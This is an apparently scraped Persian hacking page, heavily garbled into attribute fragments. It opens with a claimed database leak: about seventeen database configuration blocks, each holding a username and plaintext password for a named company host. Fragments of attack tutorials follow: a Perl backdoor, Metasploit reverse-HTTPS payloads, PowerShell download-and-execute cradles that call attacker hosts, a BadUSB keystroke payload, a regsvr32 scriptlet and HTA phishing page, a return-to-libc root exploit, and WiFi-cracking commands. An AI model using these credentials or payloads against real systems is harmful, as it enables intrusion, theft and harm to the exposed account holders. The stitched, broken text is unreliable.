Our coworkers have been infiltrated; the main database is about 17 gigabytes, which will not be released due to security issues.
REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘modadi356639’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘amirhos178787’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘SMANE30071626’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘M13771377’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘amiri2020201’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘AR097813131’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘Eeza1378907’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘TOOOOOO888878’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘hasabcaaaaaafe’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘Hesmaaa’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= 
DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘KHOHOCOOOO’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘AMAZING1378’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘AMIR1378MAHDI’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘NO09178881’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘MAHDII07’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘y137899969’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘tahayman1368’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘love98877’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘milad7khat98’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘13901390M’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, 
‘NAME’: ‘cafebazaar’, ‘USER’: ‘B1no1111’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘KAMALIIIIIIHA’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘hasanfadrdddi’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘jo808080’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘FErheste’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘FR11111111111 ‘, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { TELEGRAM: @HACKGM REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘Sinagolih’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘JANSINA1370’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘HI1234566666’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘mortezagholami’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘sadafff’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘S0933532o’, 
‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘hamideslhami’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘madar999999999’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } {
https://youtu.be/5eYYosEY_hE
new(” localport=”>” 1337,=”” type=”>” reuse=”>” 1,=”” listen=”>” 10)=”” or=”” die=”” “$@\n”;=”” $client;=”” while($client=”$server->accept())” select=”” $client=”” “http=”” 1.0=”” ok\r\n”;=”” “content-type:=”” text=”” html\r\n\r\n”;=”” ‘<h1>######<=”” h1>=”” continue=”” close($client);=”” chld=”>” -$$;=”” enterback=”” tab19.upload=”” 20.perl=”” target.com:1337حالا=”” 1337=”” ببینید,کلام=”” ساله=”” بورس=”” ماندگی=”” مجال=”” میکردند=”” 90%=”” webapp=”” بودن=”” امیدوارم=”” استفادتون=”” باشه.https:=”” privilege_escalationhttps:=”” www.owasp.org=”” index.php=”” sql_injection-#influential=”” tacticsمراحل=”” جزئیات=”” میپردازم,تا=”” #roadmap=”” خیر.آقایان=”” بیسواد=”” غیرمستقیم=”” پشت=”” میزنند=”” گاف=”” تناقض=”” مسائل=”” درآوردی=”” #apt=”” محصور=”” قدرتمند=”” تصویر=”” مراحله=”” نداره=”” کرد.خب=”” میبریم=”” اشاراتی=”” کرد#persistenceدر=”” پنهان=”” bootkit=”” registry.#privilege=”” escalationدر=”” administator=”” میده.#defense=”” evasionدر=”” منجر=”” obfuscation=”” code=”” signing=”” افزارهای=”” میکنه.#credential=”” accessدر=”” آورد=”” credential=”” dumping.#dsicoveryدر=”” مپ=”” تهیه=”” پروسس=”” ها.#lateral=”” movementدر=”” قانونی=”” میره=”” rdp=”” shares#executionدر=”” execution=”” rundll32=”” msxml=”” powershell=”” regasm=”” گوناگونی=”” باشه.#collectionدر=”” جریان=”” keylogger=”” webcam=”” دیگه.#exiftrationدر=”” ارتباطات=”” آپلودهای=”” c&c=”” protocol=”” encrypt=”” compress=”” transfer=”” اطمینان=”” شدن.#command=”” controlخب=”” کننده=”” تیمی=”” مینویسه=”” ضعف=”” مشکل=”” انداخت=”” اختصاصی=”” الگریتم=”” dga=”” c&c.و=”” نکات=”” آیتم=”” میباشند,در=”” فراگیری=”” الزام=”” برسونه=”” ورود=”” pentesting=”” موفق=”” privilege=”” اساس=”” محسوب=”” میشه.حالا=”” گفتن=”” شاز=”” واقعا=”” ارزش=”” حد=”” شخصیت=”” کانالش=”” آقا=”” روانی=”” میبره=”” کنه,فضای=”” گروه=”” نیستند=”” شخصی=”” نواحی=”” اصلا=”” توهین=”” نیست.https:=”” www.fireeye.com=”” solutions=”” cyber-threat-intelligence.htmlبحث=”” عاملی=”” بهتره=”” راستای=”” بعضا=”” نظرات=”” خصومت=”” پیاده=”” نفوذهای=”” نیازمند=”” دایره=”” 
امکاناتی=”” کارهای=”” کمک=”” باشه,بسیاری=”” غیر=”” کارشناس=”” دیدم=”” دلیلشون=”” نباید=”” منظورشون=”” خلقت=”” باش=”” موس=”” کیبورد=”” ابزارهای=”” وبسرورها=”” بنویسه:)خب=”” اشخاصی=”” اصطلاحا=”” اینکاره=”” نیستن=”” چرا؟=”” بخواهید=”” نخواهید=”” لحاظ=”” ماموریت=”” بقیه=”” مشارکتی=”” پیشرو=”” بکنه=”” باشه؟=”” هدفتون=”” ارگانی=”” نقاط=”” ارگانه=”” کشورتون=”” ماموریی=”” پتانسیلی=”” علم=”” جلو=”” برتر=”” پیروزی=”” حریف=”” مقابل=”” آمده=”” افزاری=”” امکانات=”” مشکلاتی=”” آورده=”” جدی=”” بزرگی=”” میگیرید=”” میخواید=”” اتوماتیک=”” ابزارهایی=”” میبرم=”” blind=”” based–union=”” based–time=”” based–error=”” based–classic–out=”” of=”” band=”” بالای=”” سبب=”” قضیه=”” متفاوت=”” نزدیک=”” پنج=”” ,=”” هزار=”” آدمی=”” رویه=”” کره=”” حفظ=”” کنه؟:)=”” جامع=”” آسون=”” کاره=”” عاقلانه=”” بدین=”” راحت=”” شده؟؟؟=”” خیر=”” اختیار=”” اونور=”” هنرش=”” دقیقا=”” دندان=”” مصلح=”” رو,بتونه=”” بزنه=”” ابزاری=”” بنویسه=”” اومدید=”” دادید=”” آرایش=”” شدید=”” حکم=”” سریعا=”” tamper=”” آسان=”” آسانتر=”” کنه…در=”” همینه=”” سلیقه=”” برخورد=”” ایرادی=”” هیج=”” دوست=”” داری=”” باشی=”” بذارید=”” کنید,اکی=”” نیازه=”” محیطی=”” error=”” مواجه=”” نفوذیopen=”” terminal1.apt=”” curl=”” gnupg=”” apt-transport-https=”” liblttng-ust0=”” kali-linux-full=”” packages.microsoft.com=”” keys=”” microsoft.asc=”” apt-key=”” “deb=”” [arch=”amd64]” repos=”” microsoft-debian-stretch-prod=”” stretch=”” main”=”” sources.list.d=”” powershell.list=”” ftp.br.debian.org=”” pool=”” icu=”” libicu57_57.1-6+deb9u2_amd64.deb=”” dpkg=”” apt-get=”” python3-pip=”” 3.pip=”” osrframework=”” crypto=”” netifaces=”” python-nmap=”” pip3=”” 4.apt-get=”” veil=”” veil-evasion;=”” config=”” setup.sh=”” –force=”” –silent=”” 5.apt-get=”” exiftool=”” 6.dpkg=”” –add-architecture=”” i386=”” upgrade=”” dist-upgrade=”” full-upgrade=”” reboot=”” 7.apt-get=”” tor=”” alacarte=”” tcpxtract=”” tesseract-ocr=”” wine32=”” jd-gui=”” rarcrack=”” steghide=”” cupp=”” websploit=”” slowhttptest=”” autoconf=”” dnsmasq=”” upx-ucl=”” gifsicle=”” nodejs=”” npm=”” adb=”” 
bettercap=”” shellter=”” mono-vbnc=”” remmina=”” bleachbit=”” haproxy=”” vlc=”” uget=”” clinfo=”” aria2=”” smb4k=”” crackle=”” pptpd=”” cppcheck=”” gimp=”” xplico=”” openvas=”” isc-dhcp-server=”” clamav=”” routersploit=”” unicorn=”” calibre=”” enscript=”” ruby-dev=”” libpcap-dev=”” python-protobuf=”” wifiphisher=”” cmatrix=”” libreoffice=”” qrencode=”” crackmapexec=”” parallel=”” inspy=”” freerdp2-x11=”” rar=”” qbittorrent=”” mono-complete=”” zmap=”” datasploit=”” idb=”” gdb-peda=”” kerberoast=”” python-gps=”” bluetooth=”” bluez=”” libcrypto++6=”” android-tools-adb=”” zipalign=”” strace=”” libzen0v5=”” python-bluez=”” privoxy=”” polipo=”” socat=”” dotdotpwn=”” clamav-daemon=”” ffmpeg=”” network-manager-openvpn-gnome=”” multiarch-support=”” etherape=”” dkms=”” virtualbox=”” libjpeg62-turbo-dev=”” libnfnetlink-dev=”” 8.apt-get=”” virtualbox-guest-x11=”” gem=”” –upgrade=”” -g=”” http-proxy-to-socks=”” 9.openvas-setup=”” generate10.openvas-start=”” 127.0.0.1:9392=”” username:(admin)=”” password:(paste=”” generate)11.hexeditor=”” press=”” ctrl+w=”” tab=”” search=”” (geteuid)=”” entereditgeteuid=”” replacegetppid=”” enter12.update-java-alternatives=”” –set=”” jvm=”” java-1.8.0-openjdk-amd64=”” 13.rm=”” fonts=”” download=”” fix-fonts.zip=”” directory14.unzip=”” cp=”” fix-fonts=”” 15.fc-cache=”” -v=”” پلاگین=”” کارآمد=”” firefoxtamper=”” data–hackbar–http=”” live–user-agent=”” switcher–flagfox–cookie=”” manager–wappalyzer–blur–copy=”” plaintext–foxyproxy=”” standard–privacy=”” badger–disconnect–noscript=”” قسمتی=”” انتهایی=”” جداسازی=”” عددها=”” گذاشتم=”” نشه=”” اینتر=”” بس=”” اینطوری=”” کاربرهامون=”” پیادسازی=”” :stuck_out_tongue_winking_eye:=”” پایپ=”” مو=”” لینوکسی=”” ماژولی=”” errori=”” بشما=”” نخواهد=”” خیال=”” بپردازید.=”” :blush::warning:نکته=”” 2018-64bit=”” میباشد…http:=”” www.sqlinjection.net=”” category=”” attacks=”” www.capterra.com=”” database-management-software=”” itsfoss.com=”” linux-hacking-penetration-testing=”” techlog360.com=”” 
top-ethical-hacking-operating-systems=”” www.droidbro.com=”” best-os-for-penetration-testing-ethical-hacking-linux=”” #bypass=”” detections=”” oob=”” runnerبد=”” میتواند=”” نظارتی=”” باینری=”” پروتکلی=”” بزنیم=”” مختصری=”” کنیم.خب=”” امروزه=”” خصوص=”” ویندوزهای=”” 7,10=”” @empire=”” اسکریپ=”” @invoke-obfuscation=”” @invoke-shellcode=”” متعددی=”” اینکد=”” آنتی=”” اخیر=”” اومده,حالا=”” رندر=”” certutil.exe=”” cert=”” جستجوگر=”” amsi=”” injection=”” استعداد=”” خوردن=”” windefender=”” شدopen=”” terminal1.git=”” danielbohannon=”” invoke-cradlecrafter.git;apt=”” update;apt=”” 2.curl=”” -;echo=”” powershell.list;apt=”” 3.wget=”” libicu57_57.1-6+deb9u2_amd64.deb;dpkg=”” 4.msfvenom=”” reverse_https=”” powershell_base64=”” psh=”” load.txt=”” tab4.apt=”” powershell;service=”” start;cd=”” invoke-cradlecrafter;pwsh=”” 5.import-module=”” invoke-cradlecrafter.psd1=”” 6.invoke-cradlecrafter=”” 7.set=”” url=”” 8.memory=”” 9.certutil=”” 10.all=”” 11.1=”” (result)=”” contentopen=”” tab12.nano=”” raw.txt=”” contentset-variable=”” rav=”” ‘http:=”” load.txt’;iex…-skip=”” 2)-join”`r`n”))=”” enterswitch=”” virtualbox(win7)=”” (lan)=”” c:\open=”” cmd13.cd=”” c:\=”” certutil=”” -encode=”” cert.cer=”” go=”” kali=”” cert.ceropen=”” terminal14.msfconsole=”” reverse_https;set=”” 443;set=”” autorunscript=”” priv_migrate;set=”” true;exploit=”” -j=”” -z”=”” 15.powershell.exe=”” -win=”” hidden=”” -exec=”” bypass=”” add-content=”” -path=”” %appdata%\cert.cer=”” (new-object=”” net.webclient).downloadstring(‘http:=”” cert.cer’);=”” -decode=”” %appdata%\stage.ps1=”” b=”” powershell.exe=”” -noexit=”” -file=”” del=”” مربوطه=”” obfuscate=”” کرد,در=”” میکنیم,خط=”” بشه,خط=”” msfvenom,خط=”” کامند=”” آپاچی=”” پاورشل=”” ششم=”” credlecrafter=”” هفتم=”” ریختیم=”” اسکریپت,خط=”” هشتم=”” شد,خط=”” نهم=”” cretutil=”” دهم=”” یازدهم=”” فایلی=”” میدیم,خط=”” سیزدهم=”” \:c=”” چهاردهم=”” پانزدهم=”” وبسرور=”” اونرو=”” decode=”” %appdata%=”” stage.ps1=”” cer=”” https=”” جوره=”” soc=”” نکتش=”” اس=”” الشه=”” 
invoke-cradlecrafterhttps:=”” docs.microsoft.com=”” windows-server=”” administration=”” windows-commands=”” certutil خب=”” درگاه=”” چند=”” داشتم=”” مقاله=”” میخوندم=”” میداد=”” آپدیت=”” easyjtag=”” موقع=”” امروز=”” بهتر=”” arduino=”” نویسیش=”” کنیم,و=”” موجب=”” بتونیم=”” سرآخر=”” دستوری=”” atmega32u4=”” نوشتم=”” افزاریش=”” ارزون=”” کنیدمرحله=”” میسازیمopen=”” terminal1.apt-get=”” arduino;service=”” postgresql=”” start;msfconsole=”” 2;set=”” (noip);exploit=”” [*]=”” run=”” following=”” on=”” machine:powershell.exe=”” -nop=”” $f=”new-object” net.webclient;$f.proxy=”[Net.WebRequest]::GetSystemWebProxy();$f.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX” $f.downloadstring(‘http:=”” (noip):8080=”” 81ztcfy2kk16ed’);=”” کنیم2.touch=”” arduino_payload.ino=”” <keyboard.h>=”” setup()=”” keyboard.begin();=”” keyboard.press(key_left_gui);=”” delay(1000);=”” keyboard.press(‘x’);=”” keyboard.releaseall();=”” delay(500);=”” typekey(‘a’);=”” delay(100);=”” keyboard.press(key_left_alt);=”” keyboard.press(‘y’);=”” keyboard.print(“powershell.exe=”” 81ztcfy2kk16ed’);”);=”” typekey(key_return);=”” keyboard.end();=”” loop()=”” {}=”” typekey(int=”” key){=”” keyboard.press(key);=”” keyboard.release(key);=”” enterما=”” ساپورت=”” میکنه,یک=”” keyboard.h=”” keyboard.print=”” نهایت=”” مهمش=”” محدودیتی=”” #invoke-obfuscation=”” مبهمش=”” شد,سر=”” برد=”” leonardo=”” burn=”” bootloader=”” وقتی=”” امادس=”” ویندوزی…http:=”” arduino.ir=”” arduinoboardmicrohttps:=”” www.arduino.cc=”” reference=”” en=”” functions=”” keyboard=”” sct=”” کرد<?xml=”” <scriptlet>=”” <registration=”” progid=”ttEU3jlH” classid=”{94fc67df-921b-335e-a900-1485bbd66997}” <script><![cdata[=”” activexobject(“wscript.shell”).run(“powershell.exe=”” $n=”new-object” net.webclient;$n.proxy=”[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX” $n.downloadstring(‘http:=”” 192.168.1.4:5151=”” an17mowq’);”,0);]]>=”” script>=”” registration>=”” scriptlet>=”” object=”” 
activex=”” wscript.shell=”” داره,همین=”” همینطوره=”” کشیده=”” کجاس,در=”” whitelist=”” تحدیدی=”” نهانتر=”” کمتر=”” جلب=”” کنه,اما=”” چیه؟همونطور=”” میدونید=”” پسرخاله=”” hta=”” vbscript=”” میکنمopen=”” terminal1.msfconsole=”” 3;set=”” 81;set=”” machine:regsvr32=”” s=”” u=”” i:http:=”” ######.ddns.net:81=”” r8jf2isimgcsoj7.sct=”” scrobj.dll=”” یک2.wget=”” –no-check-certificate=”” index.html=”” -k=”” -u=”” “mozilla=”” 5.0=”” (macintosh;=”” intel=”” macos=”” 10_12_5)=”” applewebkit=”” 537.36=”” (khtml,=”” like=”” gecko)=”” chrome=”” 58.0.3029.110=”” safari=”” 537.36″=”” “https:=”” www.microsoft.com=”” software-download=”” windows10iso”=”” فیشینگ=”” گذاشتن=”” صفحه3.leafpad=”” search(<=”” body>)<script=”” function=”” var_func()=”” dim=”” var_shell=”” set=”” var_shell.run=”” “regsvr32.exe=”” scrobj.dll”,=”” 0,=”” true=”” end=”” var_func=”” self.close=”” script><=”” body>=”” closeدر=”” دانلودی=”” بجاش=”” برید4.mv=”” index.hta=”” 5.mv=”” 6.ngrok=”” 80=”” همینطور=”” dns=”” گرفتیم=”” بگید=”” ماکروسافته=”” کن=”” :)نکته=”” بجای=”” مایکروسافتی=”” فرقی=”” شکلی=”” باشهhttps:=”” a48982be.ngrok.io=”” index.htaبر=”” شوت=”” alert=”” ندارند=”” بسیارکار=”” آمدی=”” defender=”” شد…https:=”” www.corelan.be=”” index.php چرا=”” دارند,اما=”” aslr=”” dep=”” بزنه؟=”” سادس=”” system()=”” اجرایی=”” دستان=”” نیازی=”” زحمت=”” nx-bit=”” بخورند=”” کنیدopen=”” terminal1.nano=”” bof_stack.c=”” <stdlib.h>=”” <unistd.h>=”” <stdio.h>=”” <string.h>=”” getpath()=”” buffer[64];=”” ret;=”” printf(“input=”” path=”” please:=”” “);=”” fflush(stdout);=”” gets(buffer);=”” ret=”__builtin_return_address(0);” if((ret=”” 0xbf000000)=”=” printf(“bzzzt=”” (%p)\n”,=”” ret);=”” _exit(1);=”” printf(“got=”” %s\n”,=”” buffer);=”” main(int=”” argc,=”” **argv)=”” getpath();=”” enter2.gcc=”” bof_stack=”” stack=”” bof=”” هست,حالا=”” rop=”” تکه=”” درونش=”” bash=”” بزنه,خب=”” “bin=”” sh”=”” دیباگر=”” میشیم3.strings=”” libc-2.11.2.so=”” 11f3bf=”” sh4.gdb=”” (gdb)=”” starting=”” program:=”” bof_stack(gdb)=”” info=”” map=”” 
process=”” 1727cmdline=”/root/bof_stack” cwd=”/home/user” exe=”/root/bof_stack” mapped=”” spaces:start=”” addr=”” size=”” objfile0x8048000=”” 0x8049000=”” 0x1000=”” bof_stack0x8049000=”” 0x804a000=”” bof_stack0xb7e96000=”” 0xb7e97000=”” 0xb7fd5000=”” 0x13e000=”” libc-2.11.2.so0xb7fd5000=”” 0xb7fd6000=”” libc-2.11.2.so0xb7fd6000=”” 0xb7fd8000=”” 0x2000=”” libc-2.11.2.so0xb7fd8000=”” 0xb7fd9000=”” 0x140000=”” libc-2.11.2.so0xb7fd9000=”” 0xb7fdc000=”” 0x3000=”” 0xb7fde000=”” 0xb7fe2000=”” 0x4000=”” 0xb7fe3000=”” [vdso]0xb7fe3000=”” 0xb7ffe000=”” 0x1b000=”” ld-2.11.2.so0xb7ffe000=”” 0xb7fff000=”” 0x1a000=”” ld-2.11.2.so0xb7fff000=”” 0xb8000000=”” ld-2.11.2.so0xbffeb000=”” 0xc0000000=”” 0x15000=”” [stack](gdb)=”” 0xb7e97000+0x11f3bf=”” 0xb7fb63bf:=”” sh”(gdb)=”” p=”” $1=”{<text” variable,=”” info>}=”” 0xb7ecffb0=”” <__libc_system>واووو=”” strings…=”” 0xb7fb63bf=”” اکسپلویتopen=”” tab5.nano=”” rop_exp.py=”” addedimport=”” struct=”” padding=”0000AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHJJJJIIIIKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS” 0xb7ecffb0)=”” return_after_system=”AAAA” bin_sh=”struct.pack(“I”,” 0xb7fb63bf)=”” enter6.(python=”” rop_exp.py;=”” cat)=”” input=”” got=”” 0000aaaabbbbccccddddeeeeffffgggghhhhjjjjiiiikkkkllllmmmmnnnnoooo���qqqqrrrrssss���aaaa�c��id=”” euid=”0(root)” برگشتیم=”” کردیم…https:=”” return-to-libc_attackخب=”” انجامه=”” شرط=”” سبک,یک=”” کاربری=”” رمزش=”” ۵=”” دقیقه=”” ببیره=”” ۱=”” سال,اکی=”” روند=”” سازیشopen=”” (interface)4.airodump-ng=”” (interface-mode)wait=”” (handshake)=”” (interface-mode)open=”” tab6.aireplay-ng=”” -0=”” (station)=”” (interface-mode)در=”” اطلاعاتش=”” airodump-ng=”” زیره=”” شبکش=”” کنه,در=”” کنیمaircrack-ng7.aircrack-ng=”” -a(1=”WEP/2=WPA)” -b=”” (passlist).txt=”” (handshake).capcrunch7.crunch=”” (min=”” len)=”” (max=”” “(characters)”=”” aircrack-ng=”” (handshake).cap=”” (essid)example7.crunch=”” “1234567890”=”” afshin@@@@@@=”” -a2=”” 01.cap’=”” wifi-######=”” cowpatty7.cowpatty=”” -s=”” (essid)genpmk7.genpmk=”” (essid)passgen7.git=”” 
blmvxer=”” passgen.git=”” 8.cd=”” passgen=”” passgen.py=”” 9.python=”” -lu1=”” -w-=”” (handshake).caphashcat7.aircrack-ng=”” wpacrack=”” 8.hashcat=”” 2500=”” wpacrack.hccap=”” (passlist).txtدر=”” passlist=”” کنیم,در=”” بعدیش=”” بروت=”” فورس=”” نداره,در=”” cowpatty=”” رنگین=”” کمانی=”” کرک,اکی=”” wps=”” lock=”” بیاریدreaver5.reaver=”” (interface-mode)=”” (essid)=”” -vvv=”” tab6.pixiewps=”” (pke)=”” (pkr)=”” (e-hash1)=”” -z=”” (e-hash2)=”” (authkey)=”” -n=”” (e-nonce)wpspin5.wget=”” 0x90=”” wps-scripts=”” wpspin.py;chmod=”” wpspin.py=”” 6.python=”” (last=”” bssid#6)7.reaver=”” (pin)=”” -vv=”” bully5.bully=”” reaver=”” هش=”” pke=”” pixiewps=”” تشخیص=”” بیاره,تکنیک=”” wpspin=”” بیاره,در=”” bully=”” سعی=”” بشه,و=”” mac-filter=”” دارaireplay-ng5.airodump-ng=”” (interface-mode)mdk35.mdk3=”” (bssid)wait=”” ctrl+copen=”” tab6.mdk3=”” l=”” (bssid)شبکه=”” aireplay-ng=”” نویزی=”” میکنه,در=”” mdk3=”” حدس=”” بزنیمmacchanger5.netdiscover=”” (mac=”” target)7.ifconfig=”” (interface)=”” down=”” 8.macchanger=”” target)=”” (interface)9.ifconfig=”” up=”” 10.macchanger=”” (interface)بعد=”” اسکن=”” mac-address=”” اعضای=”” میدزدید=”” ست=”” راحتی… #lammer=”” hackersاین=”” ویدیو=”” اثبات=”” شیاد=”” دوز=”” نخبه=”” بزنند,کسی=”” لمر=”” واقعیه=”” سندش…#eq=”” mainبد=”” هوش=”” هیجانی=”” همکاری=”” علائم=”” ناکار=”” آمد=”” کرد… در=”” قصد=”” دارم=”” هایم=”” بهمرور،=”” مجموعهای=”” مطالب=”” مرتبط=”” کارگروهی،فرصتها=”” چالشهای=”” نمایم.قطعا=”” شرعی=”” بضاعت=”” خود،بعد=”” آفت=”” کردیم،تلاش=”” نماییم=”” محدوده=”” اختیارات=”” معضلات=”” کمرنگ=”” شوند.امیدوارم=”” روزافزون=”” رود.#آفت=”” ۱:=”” همکارانی=”” نمیکنند=”” چنان=”” ظاهرسازی=”” میکنند=”” سایرین=”” عمدهای=”” دوش=”” آنها=”” بهحساب=”” میآید،افرادی=”” میدهند=”” تأثیرگذاری=”” وانمود=”” انگار=”” 100%=”” درحالیکه=”” کمترین=”” تعهد=”” دارند.این=”” میتواند=”” نماید=”” گروه,قطعاً=”” خاطی=”” اصلاح=”” نماید.این=”” فیلم=”” کوتاه=”” 